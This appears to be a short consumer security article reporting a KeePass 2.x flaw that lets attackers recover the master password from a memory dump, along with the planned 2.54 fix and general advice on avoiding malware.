Bug in KeePass Open Source Password Manager
This is the second time the researcher has found a flaw in this password manager. But this is way worse as it affects KeePass 2. x versions for MacOS, Linux, and Windows. Attackers can obtain the master password even if your workspace is closed.
The maintainer has developed a resolution for this bug. But the fix will only be available in early June when version 2.54 is released.
The researcher who uncovered the vulnerability has released a proof-of-concept on GitHub. The researcher said that “no code execution on the target system is required, just a memory dump.” It means that it will not matter where the memory comes from. The attacker can retrieve the master password.
The attacker does not require physical access to the host’s filesystem. Remote attackers can gain access through phishing attacks, exploits, and other methods.
However, the researcher said that everyone must be calm.
The flaw had something to do with a custom box when entering passwords. When you enter your password, there are leftover strings created. These strings are used by an attacker to reassemble the password in cleartext. That is, if you type your password, the leftover strings can be ***s or *****0.
If your computer has malware, it could be configured so that the attacker can dump KeePass’s memory. The attacker can send the memory and the app’s database back to the hacker’s server. As a result, the bad actor can extract your master password at any time.
The fix that will arrive in early June will include inserting random text into the app’s memory. It would obscure the password. Because the remedy will arrive in a month or two, this makes the app vulnerable to attack. But you can download a beta version of the fix through the official website of the app.
Secure apps like password managers are prone to hackers. This is not the first time that security researchers found a serious weakness in this app.
To keep yourself safe from these online threats, make sure to avoid downloading apps from unreliable sources. You must not open files from senders you do not know. Avoid visiting questionable websites as they may inject malware into your computer. If you are using Windows, opt to use an antivirus app.
Do not share your master password with anyone.
Hackers are always on the lookout for weaknesses in popular apps. They have all the tools they need to reveal the vulnerabilities and use them to commit heinous crimes.
Password managers, when properly implemented and used correctly, are generally considered to be safe and secure tools for managing your passwords. They offer several pros over other password management methods, like using weak or repetitive passwords or writing them down on paper. But, just like any software or service, there are potential risks and vulnerabilities associated with these apps.